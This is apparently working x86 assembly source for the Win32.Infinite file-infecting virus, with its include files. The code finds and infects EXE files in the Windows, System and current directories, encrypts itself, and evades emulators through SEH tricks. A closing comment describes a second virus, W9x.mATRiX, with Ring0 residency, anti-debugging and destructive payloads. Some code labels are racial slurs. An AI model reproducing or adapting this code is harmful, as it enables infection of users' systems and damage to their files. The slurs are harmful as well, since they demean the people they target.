; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Win32.Infinite (c) 2000 Billy Belcebu/iKX º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

include host.inc ; Some nice includes


include infinite.inc

virseg segment dword use32 public 'infinite'

virus_start:

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Virus code º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

infinite:
push eax ; Make some space on stack
pushad
call decrypt

encrypt_start = $
call get_delta

call SetSEH ; Set our new protection frame


mov esp,[esp+08h]
call get_delta
jmp RestoreSEH
SetSEH:
xor edx,edx
push dword ptr fs:[edx]
mov dword ptr fs:[edx],esp

push 05h ; ECX is the limit of pages


pop ecx
mov esi,ebp ; We put a page inside our code
call CheckImageBase ; Get our own image base
mov dword ptr [ebp+modbase-delta],esi

push 05h ; 50 pages to scan


pop ecx
mov esi,[esp+2Ch] ; Put the candidate to kernel
call CheckImageBase ; Scan backwards for it
mov dword ptr [ebp+kernel-delta],esi

lea eax,[ebp+api_list-delta] ; Let's detect all the needed


xchg eax,esi ; APIs :)
lea edi,[ebp+api_addresses-delta]
call GetAPIs

; Virus is now initialized, let's search for objectives.

lea edi,[ebp+current_dir-delta] ; Save current directory to


push edi ; a temp variable
push 7Fh
apicall GetCurrentDirectoryA

lea edi,[ebp+infect_dir-delta]
push 7Fh
push edi
apicall GetWindowsDirectoryA
call SetDir&Infect

lea edi,[ebp+infect_dir-delta]
push 7Fh
push edi
apicall GetSystemDirectoryA
call SetDir&Infect

lea edi,[ebp+current_dir-delta]
push edi
apicall SetCurrentDirectoryA
call Seek&Infect

; Now let's unprotect the memory where the epo bytes will be restored

call hh&l ; Hunting high & low :)


dq ?
hh&l: push 04h ; PAGE_READWRITE
push epo_bytes
mov eax,dword ptr [ebp+rethost-delta]
add eax,dword ptr [ebp+modbase-delta]
push eax
apicall VirtualProtect

; Now it's time to go away ;)

RestoreSEH:
xor edx,edx ; Restore the original SEH
pop dword ptr fs:[edx]
pop edx

mov edi,(offset host-400000h)


rethost equ $-4
add edi,12345678h
modbase equ $-4
mov [esp.20h],edi

call over0
sebes db epo_bytes dup (90h)
over0: pop esi
push epo_bytes
pop ecx
rep movsb

popad
ret

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Mark of the virus º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

db 0,"Win32.Infinite (c) 2000 Billy Belcebu/iKX",0

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Search for files to infect º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

SetDir&Infect:
lea edi,dword ptr [ebp+infect_dir-delta]
push edi
apicall SetCurrentDirectoryA

Seek&Infect:
lea eax,[ebp+WFD-delta] ; Search for files
push eax
call over3
db "*.*",0 ; Search for all files
over3: apicall FindFirstFileA

mov dword ptr [ebp+SearchHandle-delta],eax

inc eax
jz FailOccured

SearchForMore:
push dword ptr [ebp+modbase-delta] ; Preserve untouchable info
push dword ptr [ebp+rethost-delta]

lea edi,[(ebp.WFD.szFileName)-delta]; Is the file found factible


push edi ; of being infected?
call ProcessExtension
pop edi
jecxz NotThisTime ; Nopes.

call InfectPE

NotThisTime:
pop dword ptr [ebp+rethost-delta] ; Restore this interesting
pop dword ptr [ebp+modbase-delta] ; info

lea edi,[(ebp.WFD.szFileName)-delta]; Fill this with zeroes


mov ecx,260
xor al,al
rep stosb

lea eax,[ebp.WFD-delta] ; Search for more little


push eax ; suckers
push dword ptr [ebp+SearchHandle-delta]
apicall FindNextFileA
or eax,eax
jnz SearchForMore

CloseSearchHandle:
push dword ptr [ebp+SearchHandle-delta]
apicall FindClose
FailOccured:
ret

ProcessExtension:
; input:
; EDI - Pointer to file name
; output:
; ECX - NULL if it is not an extension; 1 if it is.

xor al,al ; Search for NULL


scasb
jnz $-1

lea esi,[edi-5] ; Get the extension :)


push 05h ; Size to calculate CRC32
pop edi
or dword ptr [esi],20202020h ; Make locase the lewsers
call CRC32

cmp eax,0F643C743h ; Only EXE files


jz ItWasExtension

dec edx
ItWasExtension:
inc edx
mov ecx,edx
ret

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º PE Infection Engine º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

InfectPE:
; input:
; EDI - Pointer to filename to infect
; output:
; Nothing.

cmp dword ptr [ebp+SfcIsFileProtected-delta],00h


jz NotInWin2k

push edi ; Win2k ability: it has feature


push 00h ; that warns the user if an
apicall SfcIsFileProtected ; important file is being
; modified. If the file has
or eax,eax ; such protection, we won't
jnz ExitInfectPE ; touch it, ok? ;)

NotInWin2k:
push 80h ; Destroy hostile attributes
push edi ; and put normal ones
apicall SetFileAttributesA

xor eax,eax ; Open file for R/W


push eax
push eax
push 03h ; OPEN_EXISTING flag
push eax
inc eax
push eax
push 0C0000000h ; READ / WRITE
push edi
apicall CreateFileA

inc eax
jz ExitInfectPE
dec eax

mov dword ptr [ebp+FileHandle-delta],eax


; Save handle of opened file
push eax

push 00h
push eax
apicall GetFileSize ; Get its size
mov dword ptr [ebp+OriginalSize-delta],eax

pop ecx ; ECX = Handle

xor ebx,ebx ; EBX = 0


push ebx
push 00h ; push size
push ebx
push 04h
push ebx
push ecx ; push handle
apicall CreateFileMappingA

or eax,eax
jz CloseFileExitInfectPE

mov dword ptr [ebp+MapHandle-delta],eax

xor ebx,ebx
push 00h ; We want map only file size
push ebx
push ebx
push 02h
push eax
apicall MapViewOfFile

or eax,eax
jz UnMap&CloseMap&FileExitInfectPE

mov dword ptr [ebp+MapAddress-delta],eax

mov esi,[eax+3Ch] ; Ptr to PE header =]


add esi,eax
mov dword ptr [ebp+PtrPEH-delta],esi

cmp word ptr [esi],"EP" ; Check for PE mark


jnz Trunc&UnMap&CloseMap&FileExitInfectPE

cmp dword ptr [esi.MagicInfection],inf_mark


jz Trunc&UnMap&CloseMap&FileExitInfectPE ; Check for previous infection

cmp word ptr [esi.Machine],014Ch


jnz Trunc&UnMap&CloseMap&FileExitInfectPE ; Check for i386 ;)
cmp dword ptr [ebp.WFD.nFileSizeHigh-delta],00h
jne Trunc&UnMap&CloseMap&FileExitInfectPE ; Don't allow huge & ugly files

cmp dword ptr [ebp.WFD.nFileSizeLow-delta],4000h


jb Trunc&UnMap&CloseMap&FileExitInfectPE ; Don't allow too little files

mov eax,[esi.EntrypointRVA] ; EAX = Old file's EIP


mov dword ptr [ebp+rethost-delta],eax

mov edi,esi
add esi,0F8h-28h ; Pointer to 1st section-28h
nigger: add esi,28h ; Ptr to section name ;)
mov edx,eax ; Put in EDX the original EIP
sub edx,[esi.VirtualAddress] ; Remove the VirtualAddress
cmp edx,[esi.VirtualSize] ; Is EIP pointing to this sec?
jae nigger ; If not, loop again

mov ebx,dword ptr [ebp+MapAddress-delta]

pushad
push dword ptr [esi.SizeOfRawData] ; Some tricky thing :)
pop dword ptr [esi.VirtualSize]
mov eax,[ebp+rethost-delta]
add eax,ebx
mov dword ptr [ebp+tempshit-delta],eax
popad

add ebx,[esi.PtrToRawData]
add edx,ebx
mov esi,edx ; ESI - Pointer to section
mov dword ptr [ebp+EPofs-delta],esi ; mapped in mem where da EP is.

mov ebx,dword ptr [ebp+OriginalSize-delta] ; Search limit


mov ecx,heap_end-virus_start+security ; How many space do we need
call SeekForHoles
jc ThereWasNoHole

pushad
sub eax,dword ptr [ebp+MapAddress-delta]
mov esi,dword ptr [ebp+PtrPEH-delta]
mov edi,esi ; We wanna put some attribs
add esi,0F8h-28h ; to the section where the
niggr2: add esi,28h ; virus code is located, so
mov edx,eax ; we've to search for it :)
sub edx,[esi.VirtualAddress]
cmp edx,[esi.VirtualSize]
jae niggr2

; EAX = Ptr to hole

mov dword ptr [ebp+inf_switch-delta],00h

; Let's check if we can put ourselves inside the hole (more security)

mov edx,[esi.VirtualAddress]
add edx,[esi.VirtualSize]
add eax,((heap_end-virus_start)+security)
sub edx,eax
js wecantinfectthere
mov dword ptr [ebp+inf_switch-delta],01h
or [esi.Characteristics],0A0000020h ; PUT IT SUCKA!
wecantinfectthere:
popad
mov ecx,12345678h
org $-4
inf_switch dd ?
or ecx,ecx
jz Trunc&UnMap&CloseMap&FileExitInfectPE

lea esi,[ebp+virus_start-delta]
mov edi,eax
add edi,security ; Some security :)

pushad
mov eax,12345678h ; Let's calculate where the
tempshit = $-4 ; jmp must point to
add eax,(killemu-epo)
sub edi,eax
mov dword ptr [ebp+jmpadd-delta],edi
popad

mov ecx,virus_size
rep movsb

; Encrypt with a silly l00p

pushad
sub edi,virus_end-encrypt_start
mov esi,edi
call random
mov bl,al
mov byte ptr [edi+enc_key-encrypt_start],bl
mov byte ptr [ebp+enc_k3y-delta],bl
mov ecx,encrypt_end-encrypt_start
enc_l00p:
lodsb
xor al,bl
stosb
loop enc_l00p
popad

pushad
sub edi,(virus_size-(sebes-virus_start))
mov esi,dword ptr [ebp+EPofs-delta]
push epo_bytes
pop ecx
pushad

lewpit:
lodsb ; Store EPO bytes also
xor al,00h ; encrypted
enc_k3y = $-1
stosb
loop lewpit

popad
xchg edi,esi

call over69

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
epo: call killemu ;³ This code will give the control to the
mov esp,[esp+08h] ;³ virus and avoid the scanning of emulators
xor edx,edx ;³ at the same time :)
pop dword ptr fs:[edx];³
pop edx ;³
db 0E9h ;³
jmpadd: dd ? ;³
killemu:xor edx,edx ;³
push dword ptr fs:[edx];³
mov fs:[edx],esp ;³
div edx ;³
epo_bytes = $-epo ;³
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

over69: pop esi

rep movsb
popad

mov esi,dword ptr [ebp+PtrPEH-delta]


mov dword ptr [esi.MagicInfection],inf_mark ; Put inf. mark

; Fix checksum if needed

add esi,58h
cmp dword ptr [esi],00h
jz Trunc&UnMap&CloseMap&FileExitInfectPE

push esi ; Pointer to CheckSum field


call n4t4s
dd ? ; Where store old CheckSum
n4t4s: push dword ptr [ebp+OriginalSize-delta]
push dword ptr [ebp+MapAddress-delta]
apicall CheckSumMappedFile

ThereWasNoHole:
Trunc&UnMap&CloseMap&FileExitInfectPE:
UnMap&CloseMap&FileExitInfectPE:
push dword ptr [ebp+MapAddress-delta]
apicall UnmapViewOfFile

CloseMap&FileExitInfectPE:
push dword ptr [ebp+MapHandle-delta]
apicall CloseHandle

CloseFileExitInfectPE:
push dword ptr [ebp+FileHandle-delta]
apicall CloseHandle

ExitInfectPE:
ret

SeekForHoles:
; input:
; ESI - Pointer inside file (in PE header)
; ECX - How many space do we need
; EBX - Search limit
; output:
; EAX - Pointer to the beginning of the shit
; CF - Set if error (couldn't find hole)

call SetSEH1
mov esp,[esp+08h] ; Just for security of
call get_delta ; scanning :)
jmp NSE_
SetSEH1:
xor edx,edx
push dword ptr fs:[edx]
mov dword ptr fs:[edx],esp

push esi
GetAnotherByte:
xor edx,edx ; Clear counter :)
GAB2: dec ebx ; Check if we arrived until
jz NoShitEnough ; the limit (run away if so)
lodsb
or al,al ; NULL byte?
jz IsFillByte
cmp al,0CCh ; Int 3? (VC6 filez're full
jnz GetAnotherByte ; of them)
IsFillByte:
inc edx ; Increase counter
cmp ecx,edx
jnz GAB2
WeFoundManyShit:
sub esi,ecx ; ESI = Point to shit
xchg eax,esi
pop esi
pop dword ptr fs:[00h]
pop edx
ret
NoShitEnough:
pop esi
NSE_: stc
pop dword ptr fs:[00h]
pop edx
ret

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º APICRC32 Search Engine º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

GetAPIs proc
; input:
; EAX - Base address of the library where search the APIs
; ESI - Pointer to an array of CRC32 of the APIs we want to search
; EDI - Pointer to where store the APIs
; output:
; Nothing.

push eax ; EAX = Handle of module


pop dword ptr [ebp+TmpModuleBase-delta]
APIS33K:
lodsd ; Get in EAX the CRC32 of API
push esi edi
call GetAPI_ET_CRC32
pop edi esi
stosd ; Save in [EDI] the API address

cmp byte ptr [esi],0BBh ; There are more APIs in this


jnz APIS33K ; library

inc esi ; Check if it's the last of


cmp byte ptr [esi],"DC4" ; all them
jz EndOfAPISearch

push esi ; ESI points now to the ASCIIz


apicall LoadLibraryA ; string of a library... We
; need to load it!
push eax
nxtchr: lodsb ; Reach the end of the lib
test al,al ; asciiz name
jnz nxtchr

pop eax
jmp GetAPIs

EndOfAPISearch:
ret
GetAPIs endp

GetAPI_ET_CRC32 proc
; input:
; EAX - CRC32 of the API we want to know its address
; output:
; EAX - API address, NULL if error

xor edx,edx

pushad

call over_APICRC32_SEH
mov esp,[esp+08h] ; Set stack as before
xor eax,eax ; signalize the error
jmp Remove_APICRC32_SEH

over_APICRC32_SEH:
push dword ptr fs:[edx] ; Set new SEH frame
mov dword ptr fs:[edx],esp

xchg eax,edx ; Put CRC32 of da api in EDX


mov dword ptr [ebp+Counter-delta],eax ; Clear this field :)
push 3Ch
pop esi
add esi,[ebp+TmpModuleBase-delta] ; Get PE header of module
lodsw
add eax,[ebp+TmpModuleBase-delta] ; Normalize

push 1Ch
pop esi
add esi,[eax+78h] ; Get a pointer to its edata
add esi,[ebp+TmpModuleBase-delta]

lea edi,[ebp+AddressTableVA-delta] ; Pointer to the address table


lodsd ; Get AddressTable value
add eax,[ebp+TmpModuleBase-delta] ; Normalize
stosd ; And store in its variable

lodsd ; Get NameTable value


add eax,[ebp+TmpModuleBase-delta] ; Normalize
push eax ; Put it in stack
stosd ; Store in its variable

lodsd ; Get OrdinalTable value


add eax,[ebp+TmpModuleBase-delta] ; Normalize
stosd ; Store

pop esi ; ESI = NameTable VA

@?_3: lodsd ; Get pointer to an API name


push esi ; Save again
add eax,[ebp+TmpModuleBase-delta] ; Normalize
xchg edi,eax ; Store ptr in EDI
mov ebx,edi ; And in EBX

push edi ; Save EDI


xor al,al
scasb
jnz $-1
pop esi ; ESI = Pointer to API Name

sub edi,ebx ; EDI = API Name size

push edx ; Save API's CRC32


call CRC32 ; Get actual api's CRC32
pop edx ; Restore API's CRC32
cmp edx,eax ; Are them equal?
jz @?_4 ; if yes, we got it

pop esi ; Restore ptr to api name


inc dword ptr [ebp+Counter-delta] ; And increase the counter
jmp @?_3 ; Get another api!
@?_4:
pop esi ; Remove shit from stack
mov eax,12345678h ; Put in EAX the number that
Counter = $-4 ; the API occupy in list.
shl eax,1 ; *2 (it's an array of words)
add eax,[ebp+OrdinalTableVA-delta] ; Normalize
xchg eax,esi ; ESI = Ptr 2 ordinal; EAX = 0
lodsw ; Get ordinal in AX
cwde ; Clear MSW of EAX
shl eax,2 ; And with it we go to the
add eax,[ebp+AddressTableVA-delta] ; AddressTable (array of
xchg esi,eax ; dwords)
lodsd ; Get Address of API RVA
add eax,[ebp+TmpModuleBase-delta] ; and normalize!! That's it!

Remove_APICRC32_SEH:
xor edx,edx ; Remove that SEH frame
pop dword ptr fs:[edx]
pop edx
mov [esp.1Ch],eax
popad
ret
GetAPI_ET_CRC32 endp

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Subroutines º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

CRC32:
; input:
; ESI - Pointer to the data to process
; EDI - Size of such data
; output:
; EAX - CRC32 of that data

cld
pushad
xor ecx,ecx ; Optimized by me - 2 bytes
dec ecx ; less
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jnz NextByteCRC
not edx
not ecx
xchg eax,edx
rol eax,10h
mov ax,cx
mov [esp.PUSHAD_EAX],eax
popad
ret

CheckImageBase:
; input:
; ESI - Address inside module
; ECX - Limit
; output:
; ESI - module address

and esi,0FFFF0000h
cmp word ptr [esi],"ZM"
jz ItWasKewlEnough
NotCoolAddress:
sub esi,00010000h
loop CheckImageBase
ItWasKewlEnough:
ret

random:
; input:
; Nothing.
; output:
; EAX - Random number

apicall GetTickCount
xor eax,12345678h
org $-4
seed dd -1
mov dword ptr [ebp+seed-delta],eax
ret

; Let's save some bytes ;)

get_delta:
call delta ; Get a relative address from
delta: pop ebp ; when calculate offsets
ret
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Virus Data º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

api_list = $
; db "KERNEL32",0 ; Don't needed
@VirtualProtect dd 079C3D4BBh
@FindFirstFileA dd 0AE17EBEFh
@FindNextFileA dd 0AA700106h
@FindClose dd 0C200BE21h
@CreateFileA dd 08C892DDFh
@SetFileAttributesA dd 03C19E536h
@CloseHandle dd 068624A9Dh
@GetCurrentDirectoryA dd 0EBC6C18Bh
@SetCurrentDirectoryA dd 0B2DBD7DCh
@GetWindowsDirectoryA dd 0FE248274h
@GetSystemDirectoryA dd 0593AE7CEh
@CreateFileMappingA dd 096B2D96Ch
@MapViewOfFile dd 0797B49ECh
@UnmapViewOfFile dd 094524B42h
@SetEndOfFile dd 059994ED6h
@GetFileSize dd 0EF7D811Bh
@SetFilePointer dd 085859D42h
@GetSystemTime dd 075B7EBE8h
@LoadLibraryA dd 04134D1ADh
@FreeLibrary dd 0AFDF191Fh
@GlobalAlloc dd 083A353C3h
@GlobalFree dd 05CDF6B6Ah
@WriteFile dd 021777793h
@GetProcAddress dd 0FFC97C1Fh
@GetTickCount dd 0613FD7BAh
db 0BBh

db "IMAGEHLP",0
@CheckSumMappedFile dd 078B31744h
db 0BBh

db "SFC",0
@SfcIsFileProtected dd 06DE8F7ABh
db 0BBh

; That's the end, my friend...

db "DC4"

encrypt_end = $

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Simple decryption l00p :) º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

decrypt:
pop esi
mov edi,esi
mov ecx,encrypt_end-encrypt_start
mov bl,00h
enc_key = $-1
dec_l00p:
lodsb
xor al,bl
stosb
loop dec_l00p
jmp encrypt_start
virus_end = $

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Virus Data in the heap º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

kernel dd ?
TmpModuleBase dd ?
AddressTableVA dd ?
NameTableVA dd ?
OrdinalTableVA dd ?
OriginalSize dd ?
SearchHandle dd ?
FileHandle dd ?
MapHandle dd ?
MapAddress dd ?
PtrPEH dd ?
EPofs dd ?

api_addresses = $

; KERNEL32 APIs

VirtualProtect dd ?
FindFirstFileA dd ?
FindNextFileA dd ?
FindClose dd ?
CreateFileA dd ?
SetFileAttributesA dd ?
CloseHandle dd ?
GetCurrentDirectoryA dd ?
SetCurrentDirectoryA dd ?
GetWindowsDirectoryA dd ?
GetSystemDirectoryA dd ?
CreateFileMappingA dd ?
MapViewOfFile dd ?
UnmapViewOfFile dd ?
SetEndOfFile dd ?
GetFileSize dd ?
SetFilePointer dd ?
GetSystemTime dd ?
LoadLibraryA dd ?
FreeLibrary dd ?
GlobalAlloc dd ?
GlobalFree dd ?
WriteFile dd ?
GetProcAddress dd ?
GetTickCount dd ?

; IMAGEHLP APIs

CheckSumMappedFile dd ?

; SFC APIs

SfcIsFileProtected dd ?

; Other datas

WFD WIN32_FIND_DATA <?>


infect_dir db 7Fh dup (?)
current_dir db 7Fh dup (?)
heap_end = $

virseg ends

end infinite

;------------------------------[ INFINITE.INC ]------------------------------;

;****************************************************************************
;** This is the include file for the constant and macros of the virus **
;****************************************************************************

; Constants

virus_size = virus_end-virus_start
total_size = heap_end-virus_start
inf_mark = "AIAG"

security = 20d ; Very important

PUSHAD_EDI = 00h
PUSHAD_ESI = 04h
PUSHAD_EBP = 08h
PUSHAD_ESP = 0Ch
PUSHAD_EBX = 10h
PUSHAD_EDX = 14h
PUSHAD_ECX = 18h
PUSHAD_EAX = 1Ch

; Some PE header stuff

MagicPE = 00h
Machine = 04h
NumberOfSections= 06h
EntrypointRVA = 28h
CodeRVA = 2Ch
FileAlignment = 3Ch
MagicInfection = 4Ch
SizeOfImage = 50h
CheckSum = 58h
PECharacteristics= 5Eh
DirEntryReloc = 0A0h

; Some section header fields

SectionName = 00h
VirtualSize = 08h
VirtualAddress = 0Ch
SizeOfRawData = 10h
PtrToRawData = 14h
PtrToReloc = 18h
NumOfReloc = 20h
Characteristics = 24h

; Macros

apicall macro api2call


call dword ptr [ebp+api2call-delta]
endm

; Structures
WIN32_FIND_DATA struc
dwFileAttributes dd ?
ftCreationTime dq ?
ftLastAccessTime dq ?
ftLastWriteTime dq ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
szFileName db 260 dup (?)
szAlternateFileName db 13 dup (?)
db 03 dup (?)
WIN32_FIND_DATA ends

;-------------------------------[ HOST.INC ]--------------------------------;

;****************************************************************************
;** This is the host for the first generation **
;****************************************************************************

.586p
.model flat,stdcall

extrn MessageBoxA:PROC
extrn ExitProcess:PROC

_DATA segment dword use32 public 'DATA'

szTtl db "Win32.Infinite",0
szMsg db "Size "
db virus_size/1000 mod 10 + "0"
db virus_size/0100 mod 10 + "0"
db virus_size/0010 mod 10 + "0"
db virus_size/0001 mod 10 + "0"
db " - "
db "Virtual "
db total_size/1000 mod 10 + "0"
db total_size/0100 mod 10 + "0"
db total_size/0010 mod 10 + "0"
db total_size/0001 mod 10 + "0"
db 10,"(c) 2000 Billy Belcebu/iKX",0

_DATA ends

_TEXTNUL segment dword use32 publicNUL'CODE'

virus_init proc
jmp virus_start
host:
db epo_bytes dup (90h)
call MessageBoxA,0,offset szMsg,offset szTtl,0
call ExitProcess,0
virus_init endp

_TEXT ends
;comment ÿ
;
;released
;
;ú ÄÍÄÍÍÍÍÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄúÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÍÍÍÄÍÄ ú
; ÜÜÜÜÜ °
; ÛÛÛÛ ° ßßßß ÛÛÛÛßÛÛÛ ÛÛÛÛßÛÛÛÛ ÛÛÛÛ ÛÛÛÛþßßßß ÛÛÛÛßÛÛÛÛ ÛÛÛÛßÛÛÛÛ2000
; ° ²ÛÛÛ ° ÛÛÛÛ ²ÛÛÛÜ ° ÛÛÛÛþ ÛÛÛÛ ° ²ÛÛÛ ÛÛÛÛ ÛÛÛÛ ° ²ÛÛÛþ °
;°°°°²ÛÛÛ°ÛÛÛÛ°²ÛÛÛ°ÛÛÛÛ°°°°°ÛÛÛÛ°ÛÛÛÛ°²ÛÛÛ°Û°ÛÛÛÛ°²ÛÛÛ°²ÛÛÛ°°°°°°²ÛÛÛ°ÛÛÛÛ° °°
; ° ²ÛÛÛÜÛÛÛÛܲÛÛÛ ²ÛÛÛ ° ²ÛÛÛÜÛÛÛÛ ²ÛÛÛÜÛÜÛÛÛÛ ²²ÛÛܲÛÛÛ ° °²ÛÛÛÜÛÛÛÛ[LW]
; ßßßßßßß °
; W9x.mATRiX.size by LiFEwiRE [ShadowVX] - www.shadowvx.org
;
;
; Intro
;
; This virus is my first windows virus, and the result of reading some
; docs, tutorial and (Ring0 virus)-sources.
;
; It is not a very complicated virus, and it doesn't use new technics
; too... Maybe the ASCII counter is some unusual feature.
;
; When debugging is enabled, this things are extra:
;
; Unload when dword at bff70400 <> 0h
; Beep at certain events (get resident, unload & infect)
; Beep can be turned off by changing byte ptr at bff70408 <> 0h
; only infects files at your D: drive (it's my test drive)
;
; I use WinIce to modify the values.
;
; Specs:
;
; Ring0 resident, infects on IFSmgr file rename, open and attrib, EXE,
; SCR and COM (!) files. Com files are infected for the payload, a scene
; from The Matrix. The COM files are not really infected, but some date
; checking code and action is appended on it. When the month is equal
; to the date the payload will start.
;
; Infection : Increasing last section, and make a jump at orignal
; entrypoint to it (when modifying EP to last section
; AVPM will popup:( )
;
; Encryption : XOR'd and polymorfic-build-up-decryptors.
; Armour : Anti debugger & anti emulator (SEH & Anti-SoftICE)
;
; Payload(s) : 2, as i said above 1 which is appended to all .com files
; on opening and c:\windows\win.com which will display
; 'Wake up Neo... / The Matrix has you... / w9x.mATRiX'
; like in the movie (except the last sentence, w9x.mATRiX:)
; when the day is equal to the month (1 jan, 2 feb,etc.)
;
; the other payload will remove the shutdown command from
; the start menu using the registery - at 06 april.
;
; KnownBugs : No I know... I tested this code a lot, and a friend of me
; : infected his own PC accidently and it worked really good
; :)... The only problem is that F-prot hangs on infected
; files... hehe but that's not my problem :)
;
; Thanx to : Lord Julus, Billy Belcebu & Z0MBiE.
;
